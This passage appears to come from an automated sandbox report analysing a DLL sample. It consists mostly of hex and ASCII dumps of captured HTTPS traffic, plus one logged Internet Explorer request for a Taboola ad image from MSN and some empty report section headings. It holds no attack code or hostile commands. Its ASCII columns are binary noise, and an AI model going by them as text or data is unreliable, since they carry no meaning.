                                                                                                                                                                                                                                  Data Ascii: IIRR_~=.Y2q!}e0x}r8xRE4%RNt KW:NP5>tcj@H7ZTer";)EhxE~N@@&J8K}z9RDRD<4P'BF{\nOvhS%x!Wzzmv3HI%fFa
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC235INData Raw: ee 91 5b 2f e9 fc 41 90 12 a5 93 38 2c 38 c4 c5 85 d8 bb 54 00 f5 6f 38 d5 f4 37 f5 0b 36 3f a6 f5 8d 3b 2f 12 0c 9d 4b 3b 0b ed 20 c9 c8 5c 67 c5 c7 cd c8 92 41 95 9a e3 21 49 77 ec 15 68 d1 29 c4 e0 9a 03 9e a0 9e 28 11 84 c9 7b 92 41 16 f3 7e 40 31 cb 78 b3 e2 3e 8a a9 ab e1 e6 c8 e2 d4 99 78 52 26 a6 a1 8a 40 0a 2f 9b d6 99 96 bc 48 fa c7 eb 07 a6 64 c2 c5 97 4d d1 70 b4 cd 4b 1b 16 18 27 d4 70 96 3a c9 c9 8b 29 cb 4e f1 c6 aa 63 99 e1 90 32 f0 51 3b 64 00 77 0e 93 e2 67 4a 5f fc 68 92 e4 ff 00 90 1f c0 81 a9 f3 b8 eb 68 2f 09 c0 71 52 78 99 cf c4 95 f0 eb 28 c2 e4 9a 31 04 04 93 40 f4 dd b3 81 fd 4b fa bb fa 89 fe 03 ad fa 3f 03 50 8d b0 35 27 c7 c8 76 87 4d 8b 2e 71 34 18 18 f8 63 1f 23 3b 26 08 44 30 cb 0c 17 30 8e 99 49 d9 b8 d0 a7 78 6f ae f1 9c
                                                                                                                                                                                                                                  Data Ascii: [/A8,8To876?;/K; \gA!Iwh)({A~@1x>xR&@/HdMpK'p:)Nc2Q;dwgJ_hh/qRx(1@K?P5'vM.q4c#;&D00Ixo
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC236INData Raw: 0e 1d b3 7a 77 be 71 51 c6 f1 69 95 26 6c d5 a8 25 08 42 80 53 39 0a 67 14 1e 63 f0 e6 3f 9e 2f a8 3f 54 f3 7e a7 fd 67 92 71 99 2c 9a 6e 06 a2 61 c3 75 6d d1 fd 96 04 59 13 cb 3d 00 54 ab 08 2f 70 aa 06 fe 47 5f 74 fa 2f d2 53 c2 fd 3e 5a e6 25 21 65 20 11 72 c6 a1 d8 6c fa 65 1f 9b 3e bd f5 75 f1 bf 52 9c 84 cc 2b c1 34 91 42 3c 36 17 f3 b9 a8 78 0e d0 71 1a 48 75 bf 50 b4 85 a4 91 9a 04 76 22 d5 25 69 27 75 36 39 34 d4 42 d9 50 7f 34 3a f7 11 30 09 8c 0f 80 28 bf 9d 86 b6 f6 19 39 e4 94 92 9c 4a 60 40 ab 76 2f 97 c3 c6 5f 48 c0 63 19 af 92 fb 76 e5 be a3 91 1a 8f 67 6e 34 91 91 59 80 b0 a0 b5 b0 e2 eb f2 6b a0 f1 25 2e 84 9f 09 50 48 14 05 ec 7d 5d f6 a6 8f 16 3c 22 12 42 a6 02 e9 00 b9 b1 76 bb 7f 4f 0f 6f 45 ec 3e 8d d4 72 89 8c 43 91 24 ca d1 b0 63
                                                                                                                                                                                                                                  Data Ascii: zwqQi&l%BS9gc?/?T~gq,naumY=T/pG_t/S>Z%!e rle>uR+4B<6xqHuPv"%i'u694BP4:0(9J`@v/_Hcvgn4Yk%.PH}]<"BvOoE>rC$c
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC237INData Raw: be 81 d2 9b 2f d7 9a 6c 30 ec cc 58 b2 b1 9a 6a 2c 08 24 2d b9 af 21 2b 8d b5 cf cd 1e bc 94 e1 98 86 ff 00 a9 72 d4 f3 c8 dc d7 61 10 5a 0a 85 0b 1e fb 3f 11 6c 7e af 66 a0 f4 ce af c5 c9 d9 8f 0a 1a 7a 91 3b 6a aa c1 0d 59 dd fe 61 f3 fc 73 d4 27 a4 25 78 b5 a3 db bb 12 63 c8 40 4b 0c 40 9b 36 7d 03 fb b5 2d 9c 50 96 85 61 83 27 36 46 6a 35 1b 29 bd db 54 37 c7 e2 ff 00 02 8f e0 9e ab d4 7c 24 03 5d 2e 6f ce 2d a4 24 84 e2 48 20 e4 6b db 5a 01 af ee d3 3b 28 c4 c6 9a 47 1b b6 95 2a 48 48 c8 3c 13 21 35 b5 4f 00 7f 37 d4 c1 fe 27 96 56 ef b3 0f a4 15 8a d2 86 95 7a bf b9 0e 79 f9 4e 7a 73 4a 7d 23 d0 11 66 66 c4 17 33 50 d7 32 fe d8 f7 06 d0 02 01 6e 2c 95 da 1c d0 aa b0 0f 42 9a 42 e6 1d 77 6f 3a f5 bc 12 54 a2 94 7f 20 75 2f a6 9f bc e2 0b 4b c5 39 59
                                                                                                                                                                                                                                  Data Ascii: /l0Xj,$-!+raZ?l~fz;jYas'%xc@K@6}-Pa'6Fj5)T7|$].o-$H kZ;(G*HH<!5O7'VzyNzsJ}#ff3P2n,BBwo:T u/K9Y
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC239INData Raw: f3 09 2e 2b 7a 65 4c ef 0e 09 84 b5 80 d4 0c b9 bf 75 d5 e0 ce 19 3b f0 7b e3 f7 88 d7 60 e0 6d 4e 15 ca f1 e0 29 fd c4 51 f3 d7 88 6e 7b 56 dc bf b8 f4 c6 a3 10 6f 62 fa 77 61 01 be a4 d1 97 33 1d bd d2 89 0e e4 8c 3e cd a2 22 01 01 02 78 db fb b9 16 47 8f 3d 3d c2 2d 81 0f 5b d4 b3 93 93 1a fa bf 93 c2 5c 44 a0 b4 bb 57 af 4b 7a c5 5c f5 3c 79 5a 0e 69 99 b1 9e 48 22 73 dc 8e 32 db b9 dc 0b 90 3f 71 5b b2 08 f3 43 ab 19 73 30 87 70 49 dc 6b dd 2d 15 2a 41 b1 a1 15 07 cb 56 7c 9a 02 f5 7f 4b 7a 73 d6 f8 cd 3b a5 66 64 42 2e 63 60 e3 ca 78 56 2b b8 50 a0 a1 48 16 a7 9a f8 ea d7 85 e2 97 89 20 29 83 ea 58 b6 54 c9 f5 6d 21 89 7c 4c c9 4a 48 53 b6 bf e3 a6 ff 00 80 08 ca 11 7a af a2 3d 53 e9 89 da 48 20 fb ec 18 cf 64 e5 22 4a e7 b5 76 37 1f 1c 82 2e 8d 9a
                                                                                                                                                                                                                                  Data Ascii: .+zeLu;{`mN)Qn{Vobwa3>"xG==-[\DWKz\<yZiH"s2?q[Cs0pIk-*AV|Kzs;fdB.c`xV+PH )XTm!|LJHSz=SH d"Jv7.
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC240INData Raw: af 33 da 07 88 ff 00 d4 f6 e6 d5 fc 3f 9c 02 6a 59 e9 2e e8 e4 88 0b 56 3b 89 0a 42 81 f1 56 38 1c 1f f4 e8 fb 16 a9 a3 9f 2c b5 cb 9c 73 19 cd 3f 1e c0 77 ce 03 73 73 96 31 19 89 04 aa 03 06 62 dc a9 55 f0 7f 9e 45 7e 4f 4e fd bf f8 f1 83 50 d5 1a 3d 45 2d d9 e7 13 32 96 6a 81 ea 07 af f5 00 3a 96 6c 5b 67 86 42 c5 e4 6d ea 07 84 dc 00 71 74 4b 50 fe c2 f9 ae a7 2d 6e 46 ae 01 b7 58 2c d3 81 09 52 5f 22 48 b8 eb fb 66 80 2d 47 50 12 c7 24 6c e5 63 8d 09 8e 41 7b 26 5b 02 34 2c 39 59 37 8f f2 90 07 00 f4 56 f1 bb 10 1c fb 6b bc 23 36 79 4e a6 8f e7 5e 5e 76 6e 50 b0 d4 35 f2 6d 25 95 95 55 65 17 65 4f c8 2b 29 f3 ed 36 0d 1f 04 1f 9e 8e 56 95 80 12 9a 80 01 20 5d bb de fc a1 64 a5 75 26 80 d4 12 e2 86 d5 35 84 37 ab 75 f1 8d 1c f4 77 47 26 e7 54 12 c8 d1
                                                                                                                                                                                                                                  Data Ascii: 3?jY.V;BV8,s?wss1bUE~ONP=E-2j:l[gBmqtKP-nFX,R_"Hf-GP$lcA{&[4,9Y7Vk#6yN^^vnP5m%UeeO+)6V ]du&57uwG&T
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC241INData Raw: cf 30 c6 6e e5 02 3b 68 87 b6 77 37 3c ec e4 b0 a2 38 a3 c7 3e e2 d5 e3 94 4e a2 ad 45 1a 10 77 b8 f3 b4 17 87 29 21 69 b1 21 9a 8e 2b 5e fa b5 e1 b7 a6 60 c5 16 4e 9d f6 f2 b3 45 87 26 2e 5c c2 25 65 92 50 ae 8a ec c6 ff 00 e5 82 df a8 e6 bc 1a e9 25 0a 1d c3 da 96 ca 95 f5 ca 19 4d 28 82 ed a5 7c e9 d6 d0 ca d6 32 53 1f d4 39 b0 6a 0e af 3c 98 f0 e4 44 f1 15 41 26 31 3b 62 3b 36 d1 ed ab 2a 6f 50 03 5f 3c 9e b9 8b 00 0d ca 94 1e 63 f3 f3 03 2a a9 0a 4e ad 4d f7 8e dc 2b 81 b8 7b 88 23 92 05 01 fc fe 68 78 f3 cf 5b 28 c1 c4 94 2d ed da 43 1a db e3 f9 fc 9b e3 8e 7f 8f c7 42 59 01 49 76 eb 9d 69 10 53 62 96 ec cf 5f 34 db b7 78 fd b9 41 b2 b5 4c 07 3c fc f0 2e c0 e3 cf f7 ff 00 b9 10 bc c7 51 97 7a 44 26 39 99 ff 00 1d 9f 3d bd 7e 46 70 0d ea ec 65 cb d4
                                                                                                                                                                                                                                  Data Ascii: 0n;hw7<8>NEw)!i!+^`NE&.\%eP%M(|2S9j<DA&1;b;6*oP_<c*NM+{#hx[(-CBYIviSb_4xAL<.QzD&9=~Fpe
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC242INData Raw: 4e 8b 99 8b a1 6b 53 7f c0 c9 29 4c 4c 9b dd 26 2b ca 08 a1 66 fb 4c e4 7b 49 01 6b c0 e3 aa 1f ad 7d 29 2b 49 e2 64 a6 a9 0e 48 1b d4 81 71 be a7 7a c5 e7 fa 7b ea 82 5a c4 99 c7 fe 42 a6 00 e4 28 07 5c 85 c1 25 84 74 33 d2 5a e0 c8 86 38 41 8d 58 39 06 7d 85 9b 72 fe c9 05 10 cb 1b 8f 71 00 b5 d9 e7 ac 54 d4 a9 9d 7f cb b1 ec c7 e6 3e 93 c2 cc c4 c0 dc 8a f9 3d 6f 56 f2 c8 da 1c 7a 3e a0 e8 62 2c c1 e1 26 50 84 b5 6f 11 ad d8 3c 00 c1 8e d0 a5 43 30 a5 dd 67 8a e9 88 da c6 8f 57 fd fa b8 87 a5 cc fb 4a 77 6c 5f ae f2 15 d0 43 af d2 fa be c6 58 bb c0 a4 85 56 35 09 db 65 2f 4d ee 23 dd ed 20 92 a2 cd 50 e6 fa ad 9f 2b 1f 47 34 d3 41 95 0d 2f 7a 67 16 b2 a6 3e 15 8b 83 ce da 7c 69 48 b7 5e 91 d6 65 6c 41 01 95 56 51 b4 46 f6 2c d0 bd c1 3f f8 54 aa 6e ff
                                                                                                                                                                                                                                  Data Ascii: NkS)LL&+fL{Ik})+IdHqz{ZB(\%t3Z8AX9}rqT>=oVz>b,&Po<C0gWJwl_CXV5e/M# P+G4A/zg>|iH^elAVQF,?Tn
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC244INData Raw: 5f 34 c2 e8 0e 39 16 7c 74 bf 8b 15 6d 57 bf ab e7 fb de 0c 94 e0 3b 87 77 3c c5 28 dd 2b 5f 4d cc 4d 38 99 1a 55 5d e7 6d 90 ff 00 e5 66 f6 9a 03 81 55 75 e2 c7 5d ec 3f 7c c6 74 ad 60 84 9a e9 66 a5 46 d9 d4 11 af 38 de 8f 13 b4 bf b0 ae fb 70 1e 46 21 80 e7 85 ba db f3 fc fe 3a 1a ef d3 e4 c4 33 b3 ed fa a7 94 79 65 8b b9 fa 1f be 88 90 80 a5 78 00 9f e2 fc f1 e6 ba 84 79 b7 ad 73 a3 74 cc c0 ec ef 29 c8 b8 5c 32 ee 3d c1 b7 b6 45 2d 72 7e 7c 5d 57 81 43 af 04 b9 dc c7 8d 1b e6 87 c9 cb 76 62 27 37 26 d0 c6 77 3c 85 ac 9f 85 3c 6d af e3 f8 1e 49 f8 3d 10 06 55 f2 7e fb 36 f2 ee 6f 5a 7b 5e 96 a6 b4 6c f3 68 0e d4 1c a2 c8 ec cd 54 a4 07 0a 05 b0 e4 71 c9 04 83 c0 15 fc f1 7d 10 07 2c 19 fd b5 e5 dd e3 c5 29 50 63 77 a0 ae 4f 4a b6 ba be d9 42 e3 3b 3d
                                                                                                                                                                                                                                  Data Ascii: _49|tmW;w<(+_MM8U]mfUu]?|t`fF8pF!:3yexyst)\2=E-r~|]WCvb'7&w<<mI=U~6oZ{^lhTq},)PcwOJB;=
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC245INData Raw: e6 9b 86 25 0b c2 ab 05 30 19 76 dc be 4d bf 18 9f bd 2c 29 19 87 7b be 8d eb d6 16 fe 9b c9 fb 3d 57 1e 5c c8 24 fb 9c 29 44 6d 16 dd ed 2a 4a a7 1c 2a c7 f3 b0 4a 48 f9 20 6e e0 01 d5 94 e5 80 13 87 36 2c c6 e7 9e a3 d8 45 67 0c 56 66 10 af e4 1c 1d c3 d1 f9 b6 74 e7 05 be 9b 30 69 0d ac 61 46 85 26 10 4b 93 90 1c ec ed 42 d9 6b 1e d0 2c 33 6d 56 69 36 af 14 40 35 7d 02 62 04 d9 60 b3 94 6c f7 7d 74 6b 6d 48 3c bf 04 d5 b7 f9 d4 f9 57 c8 e4 f9 c4 de b3 a4 4b 87 95 a6 e4 cb b8 3e 52 41 0c 66 38 ff 00 2a 29 db 68 3c 04 ad d7 5e 68 f4 a2 4b 02 96 0c 6a d5 6f 4f ee 90 da a5 b1 4a f5 3c d9 ea ef dd cc 6f fa 3f 0b 2a 0f 57 6b f8 d8 98 f1 2e 31 d1 cf 6d 42 8a 92 49 d5 9a c8 37 c6 dd ed 60 7c 78 e8 9c 72 0f d8 90 bd 14 0b 5b 3d 33 7a 7c 35 e3 bc 38 79 d3 45 dd
                                                                                                                                                                                                                                  Data Ascii: %0vM,){=W\$)Dm*J*JH n6,EgVft0iaF&KBk,3mVi6@5}b`l}tkmH<WK>RAf8*)h<^hKjoOJ<o?*Wk.1mBI7`|xr[=3z|58yE
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC246INData Raw: a5 f9 da 97 78 80 59 94 a7 4d 46 6c 4d fe 69 71 b6 70 48 b8 a9 a7 7a 93 2b 19 d9 55 a4 c4 97 0e 64 42 c1 5a 4c 70 19 64 8c 30 f0 d1 08 f6 11 c1 5a 16 7a 12 86 21 42 7c 2d 50 43 db 6d 33 af cc 19 33 70 ab 11 ff 00 3a 07 17 cf 6b 46 e4 b0 42 d9 70 e2 aa ef c2 d4 b1 64 92 27 42 36 be 44 47 f5 05 0f 0e c2 89 1c 12 41 3d 23 3a 61 96 03 30 20 b1 35 d6 fb e7 94 5a c8 69 a0 0a 0f 09 63 53 50 1c 67 d3 f2 60 2f 55 23 ed 21 12 a9 8e 6c 59 72 30 a5 20 6d 77 11 27 77 1d 8e e1 56 f0 8d a7 e6 ef cd f5 63 c1 ac 2f 0d 58 92 06 81 dc 75 f3 7c b3 8a 3e 3a 5a a5 95 51 c1 b3 9b 0a eb a5 b4 35 8a b1 ea 5c 44 78 33 5e 24 0c 44 d2 4d 1a 9f 3b 09 24 98 c0 fd a7 c1 3f da f8 e3 ad 6f d3 66 32 83 9b 01 43 51 5c c8 f9 a5 29 ac 63 fe a5 25 d2 59 3e 20 f5 03 c5 b7 2c c7 bb 90 61 65 fb
                                                                                                                                                                                                                                  Data Ascii: xYMFlMiqpHz+UdBZLpd0Zz!B|-PCm33p:kFBpd'B6DGA=#:a0 5ZicSPg`/U#!lYr0 mw'wVc/Xu|>:ZQ5\Dx3^$DM;$?of2CQ\)c%Y> ,ae
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC247INData Raw: 8a 5c 83 98 bf ce 79 69 ab 3b cb 45 fa 63 87 b2 27 8f 10 6d 0a a7 f4 c3 ee a3 4e e1 9d 89 db ca d5 00 45 5d 79 ae 96 3c 42 cb 65 c8 d0 f6 3d 75 86 04 a2 9b 00 2f fd 77 a7 9b 9f 43 f4 3b c7 da 93 b4 cf 0e c0 63 8d 52 c0 14 17 60 60 a3 f6 df 03 82 79 34 3a 1a a7 07 b0 e9 96 ae df 2f f8 61 08 d3 a9 fd 69 93 57 d6 1b da 07 a5 57 1a 08 58 e3 c7 4f 16 f6 62 4a 80 37 1d 8a 55 94 51 b5 a2 09 b0 38 1c 9e 96 5c e1 e6 e4 57 23 98 14 68 e8 93 e2 27 33 9e a4 f6 d5 3b c1 be 16 02 63 1d c4 ab b2 b0 69 23 8f 80 ae 40 0b 19 66 25 77 6e 27 83 c9 22 fc 74 9c c9 a5 4a 61 50 c1 ab 89 ea 7f a6 ad e1 d9 61 92 01 be 27 77 1a 79 b0 c8 3f 57 68 97 83 1f 22 5d e1 e2 54 8d d9 09 61 b7 70 93 c1 b2 38 66 ae 0d 71 44 58 e8 24 10 ce ed 90 f4 27 d7 d2 91 36 0e f7 3e a6 85 d8 91 96 f7 ab
                                                                                                                                                                                                                                  Data Ascii: \yi;Ec'mNE]y<Be=u/wC;cR``y4:/aiWWXObJ7UQ8\W#h'3;ci#@f%wn'"tJaPa'wy?Wh"]Tap8fqDX$'6>
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC249INData Raw: c4 99 19 93 3b 17 07 95 0c 40 54 22 b7 5d 8e 05 74 59 4a c6 a5 83 9b 61 7a ed 9f 3b d5 9b 4b 4a 72 42 52 85 30 60 92 32 b9 20 f7 a5 62 2b d2 93 c7 f7 9a ee 3a ac 05 31 f2 b4 08 d0 90 1f 64 c6 d1 ca 0f 05 bf e2 36 83 44 af 3c 75 e9 c9 32 f0 97 cd dd fc f2 f7 1e 90 34 ff 00 ca 02 5a f7 60 1a 9a d9 ef b0 d6 15 b3 e9 59 18 be b8 d5 31 0c 6d b5 f2 9e 45 3d c6 50 c6 30 8e ac 8e b6 b7 dc 56 1e e1 62 ab f3 d5 a4 c9 c9 5f 0f 25 92 03 8a 38 a9 a0 2f e4 29 f8 8a f4 f0 eb 1c 4c c2 3c 29 1f e2 09 01 9c dc 06 17 a7 36 34 0d 06 be ac d3 e2 c5 11 cf 8f 59 0a f1 0b 6f 98 51 f2 ce 43 ee 3f b6 c0 71 c0 b1 c9 e9 59 13 4a 54 41 24 0a fb d8 79 de 08 a9 4c 6a c7 57 6e 77 6e ce b0 27 a4 e9 b0 e3 e6 0d 4b 21 d6 08 b4 c3 3c 73 bc 80 b0 c6 59 99 d9 a7 da be 64 30 c9 db 41 56 4b ff
                                                                                                                                                                                                                                  Data Ascii: ;@T"]tYJaz;KJrBR0`2 b+:1d6D<u24Z`Y1mE=P0Vb_%8/)L<)64YoQC?qYJTA$yLjWnwn'K!<sYd0AVK
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC250INData Raw: 72 7b 8f f8 6c 6d b9 5c 02 23 97 3d 14 29 26 ff 00 79 01 43 df 1c df c7 4e 2d 45 d0 9c b0 d4 6e 05 fb a1 0d b4 28 bf e0 56 2f 88 80 fa 53 dd fd 20 2f 57 96 0c ac 48 b4 e9 98 41 38 13 cf 8c 5c 0d a5 0c c5 76 06 3c 13 7b 9a af 75 0b f1 d3 92 1d 20 bf f1 28 3d 5d aa 33 f3 6e 4d 0a cc 0e a4 0e 6a 7f fd 85 88 fe be 22 13 5c c1 8f 23 54 f4 d6 b7 91 20 33 62 c5 a5 e3 65 b0 04 b0 78 b2 64 c2 96 77 00 d2 b3 6d 88 9b e3 6b 06 3e 47 53 05 e5 ad 00 b2 6f 91 ad 33 2f cb 3b f9 f1 24 09 c8 54 c0 14 49 60 6b 61 b0 0d 9f 4d e3 43 58 c5 68 32 b2 31 5a 49 1a 59 b2 b2 a0 8a dc 95 4a 7e ec 5b 80 00 8f 6b 29 06 8f 90 2f cf 50 4a 02 bc 27 09 37 34 14 03 d6 9a eb a4 32 b2 a5 02 09 f0 87 29 1d d9 9b 28 5e 61 1c 6c ac bd 6d e7 9a 08 35 2c 3d 2b 53 c1 c9 c6 50 0f de 48 d8 ec 71 f2
                                                                                                                                                                                                                                  Data Ascii: r{lm\#=)&yCN-En(V/S /WHA8\v<{u (=]3nMj"\#T 3bexdwmk>GSo3/;$TI`kaMCXh21ZIYJ~[k)/PJ'742)(^alm5,=+SPHq
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC251INData Raw: 67 37 3a f5 82 b8 7e 9d 44 8b 19 8e 07 64 95 d2 1c a2 54 95 12 1b 00 29 dd c8 56 ab 35 c1 1e 7f 03 33 0a 4f 85 4c 3c df e4 fa f4 b4 59 4b e0 69 e2 01 8d 5c e7 a1 d6 da f4 82 ac 3f 40 6d 53 db c6 45 46 8e 25 65 21 64 31 4a b6 18 ff 00 d7 4c 00 25 45 9b 22 f8 e8 53 78 a5 0c e9 dd 7e 35 39 41 13 c1 b4 c6 64 9a 73 2d 6c ff 00 05 ab a0 7d 85 f4 0d 77 82 60 96 59 29 89 89 76 ed 7a a0 c0 91 57 40 ee a1 f1 cd 71 d0 93 c4 bb d5 47 af 7f d6 e6 85 4f 02 93 8b 12 5e ec 1e d7 76 39 38 6a d9 9f 68 99 c1 fa 79 26 c8 e7 8f 4d 6e 17 61 32 53 33 a7 90 44 61 54 82 4f 0b 56 08 16 3a e7 df 52 96 52 09 c3 4d f2 7b 57 ba d2 3a 9e 0a 58 50 f0 6c 1e 8f cf 6e af 12 c9 f4 f0 80 c1 70 16 58 65 42 d2 dc 4d dc 8f e7 65 5f cd 50 e0 f2 3e 3a 5a 64 f5 02 40 7a b9 0e 05 c6 d5 77 d7 3d a1
                                                                                                                                                                                                                                  Data Ascii: g7:~DdT)V53OL<YKi\?@mSEF%e!d1JL%E"Sx~59Ads-l}w`Y)vzW@qGO^v98jhy&Mna2S3DaTOV:RRM{W:XPlnpXeBMe_P>:Zd@zw=
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC253INData Raw: 2d e8 5f 4d 7d 3d c3 d8 19 57 13 2f 53 60 e8 49 65 4f b8 cb de a0 82 c4 00 aa 43 82 db 8a 8f 17 d5 47 0f 34 f1 1c 54 d5 a8 bb 16 14 de 9a 01 7c b2 8b 8e 21 03 84 e1 50 84 f8 4a ae 93 7f e3 cd fc ad 14 8f 56 49 35 6d 53 2a 33 ec 4d 43 d4 7a 6c 68 08 27 f4 59 c4 20 78 1b e9 18 31 03 8a e7 c0 eb 69 c3 11 2b 87 24 0b 4a 51 0e cc ec a2 0f 4e da 31 53 d2 a9 dc 42 12 f4 5c c4 e4 6b e2 76 24 30 16 3c ab 16 db 03 4e ff 00 11 d5 bd 2f a0 63 4c 63 56 d4 b9 04 5d 26 12 c0 91 b0 50 b4 ec ce 09 40 3c 28 2d f0 6f 19 3c 90 9e 26 79 fe 6a 52 92 14 cd 77 0c d5 1d 5b 93 56 37 fc 1c a5 19 92 64 03 ff 00 18 48 56 16 a5 1b a9 db 97 28 69 fa df 2b 33 50 1e a4 d2 23 57 3a 72 87 c4 0e 81 88 c7 90 64 15 9e 75 55 04 30 c9 10 ec 2c a3 6e e3 ee f9 ea 93 83 49 44 e1 31 5e 25 86 af ab
                                                                                                                                                                                                                                  Data Ascii: -_M}=W/S`IeOCG4T|!PJVI5mS*3MCzlh'Y x1i+$JQN1SB\kv$0<N/cLcV]&P@<(-o<&yjRw[V7dHV(i+3P#W:rduU0,nID1^%


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.7 | 49778 | 151.101.1.44 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-10 09:11:43 UTC | 31 | OUT | GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F11b9f069e5e00ff6dd3050259af20493.jpg HTTP/1.1
Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
Referer: https://www.msn.com/de-ch/?ocid=iehp
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: img.img-taboola.com
Connection: Keep-Alive
2021-09-10 09:11:43 UTC | 70 | IN | HTTP/1.1 200 OK
Connection: close
Content-Length: 15509
Server: nginx
Content-Type: image/jpeg
access-control-allow-headers: X-Requested-With
access-control-allow-origin: *
edge-cache-tag: 559838787932382582557766922736754224237,335819361778233258019105610798549877581,29ecf9b93bbf306179626feeda1fab70
etag: "bf391688f908c659d6e40b810aae418c"
last-modified: Tue, 24 Aug 2021 14:16:06 GMT
status: 200 OK
timing-allow-origin: *
x-ratelimit-limit: 101
x-ratelimit-remaining: 100
x-ratelimit-reset: 1
x-request-id: 158e7bea3af9b54d4bd7c00dace666b6
x-envoy-upstream-service-time: 290
X-backend-name: CH_DIR:3FP7YNX3LMizprTZsG7BSW--F_CH_nlb802
Via: 1.1 varnish, 1.1 varnish
Cache-Control: public, max-age=31536000
Accept-Ranges: bytes
Date: Fri, 10 Sep 2021 09:11:43 GMT
Age: 811515
X-Served-By: cache-wdc5568-WDC, cache-dca17750-DCA, cache-hhn4072-HHN
X-Cache: MISS, HIT, HIT
X-Cache-Hits: 0, 1, 1
X-Timer: S1631265103.382296,VS0,VE1
Vary: ImageFormat
X-debug: /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F11b9f069e5e00ff6dd3050259af20493.jpg
                                                                                                                                                                                                                                  Data Ascii: qm8o{y10BI,rY&K-jQZa_R9v JU&JaE;v6'% >%$x1 (H[P"jFd}(E%F4 &L$cpf2Wf!/<NEA:X$IKI}:Q2=5{W-
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC85INData Raw: 74 42 01 89 6b 86 44 fd 68 80 b0 23 fd ca 26 4d 69 6c cf e8 47 bd 64 c3 26 27 7c 0f 7a 2d 1a ca 29 8e 40 58 9a ce c3 e6 70 2b 6f c4 40 9f c7 94 8c d1 31 76 ef 5e e5 a8 10 a2 40 f2 a4 09 02 9b 52 a0 96 9d c4 e4 56 2e db 5b 24 15 e5 90 25 7e e2 05 1c a3 c7 6d c4 d0 e5 b6 09 d8 40 26 2b 25 94 64 60 98 06 9b 52 f0 d2 d0 60 e6 b0 88 58 88 fc c4 cc e3 e7 40 43 2a 89 13 04 f8 f9 ef 4a 25 ae a0 27 d8 6f 46 6e 5d b0 b1 83 0a a1 68 b8 4f 54 c4 e0 02 60 4e 41 a6 16 f8 78 ef f1 e0 fd b6 ad 24 a8 19 9e a7 39 35 cc 2d 96 0d 81 9d c4 56 42 b1 14 40 3c 28 fb 92 45 75 d6 df 25 ad cf e1 bf f8 09 c7 4f 91 ae 75 6b 8a 31 12 45 c8 33 f5 a3 24 cc 88 e9 d8 d3 03 11 00 f7 1f a4 d1 57 c1 4f 0c 06 22 82 ca dd 47 03 f2 bf 2e 3a 6c 45 02 c2 c8 99 c6 44 1a 30 5b 94 9e f0 b5 20 d9 cc
                                                                                                                                                                                                                                  Data Ascii: tBkDh#&MilGd&'|z-)@Xp+o@1v^@RV.[$%~m@&+%d`R`X@C*J%'oFn]hOT`NAx$95-VB@<(Eu%Ouk1E3$WO"G.:lED0[
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC86INData Raw: 2a f3 8c 0c 4d a5 ff 00 cd 72 a8 7d 71 d2 28 c7 a2 bb 74 94 a8 12 82 07 c8 d0 04 f1 37 b5 27 81 00 0a 18 e1 d4 13 99 83 98 ad ce 20 6f 47 2e c1 58 ff 00 ba 4d 10 05 ab aa 1a 3a 7a 6c 64 52 c2 dc ba 0b 79 52 c2 68 c8 e3 df 87 e1 bb e8 01 66 3b b1 63 02 83 5f ba 4b df 60 37 73 d0 78 1b 0f c3 a4 d6 0e d2 7a 50 28 a0 a2 1f d4 d6 67 f1 e9 59 35 89 ae 95 36 56 0a f6 0d 9f d8 8a 60 f7 f8 8e 0a 5c e1 5d 9d 05 b0 9e da 68 8d 3c 23 a0 23 3a 9d 53 51 3e fa ea 55 6c b4 08 d8 69 02 7d e8 01 24 81 1d 18 44 66 66 89 e4 0b 9c e5 53 4d 4a 6b 51 3d 40 89 15 85 e3 5a 79 d7 66 61 e6 8e a6 b7 68 ea d4 a3 13 07 ad 11 a5 c0 c3 2e d0 0f 7f 35 81 76 49 0c bb 69 3e 69 b4 2f 03 72 e4 ea 5e e7 b9 a9 3f cd 5e 98 65 d9 bd fc d4 70 fc 07 0e bc 43 5b 2c 08 7e 2a fb 17 52 47 65 26 6a 10
                                                                                                                                                                                                                                  Data Ascii: *Mr}q(t7' oG.XM:zldRyRhf;c_K`7sxzP(gY56V`\]h<##:SQ>Uli}$DffSMJkQ=@Zyfah.5vIi>i/r^?^epC[,~*RGe&j


                                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                  CPU Usage


                                                                                                                                                                                                                                  Memory Usage


                                                                                                                                                                                                                                  High Level Behavior Distribution


                                                                                                                                                                                                                                  Behavior


                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Start time:11:11:31
                                                                                                                                                                                                                                  Start date:10/09/2021
                                                                                                                                                                                                                                  Path:C:\Windows\System32\loaddll32.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
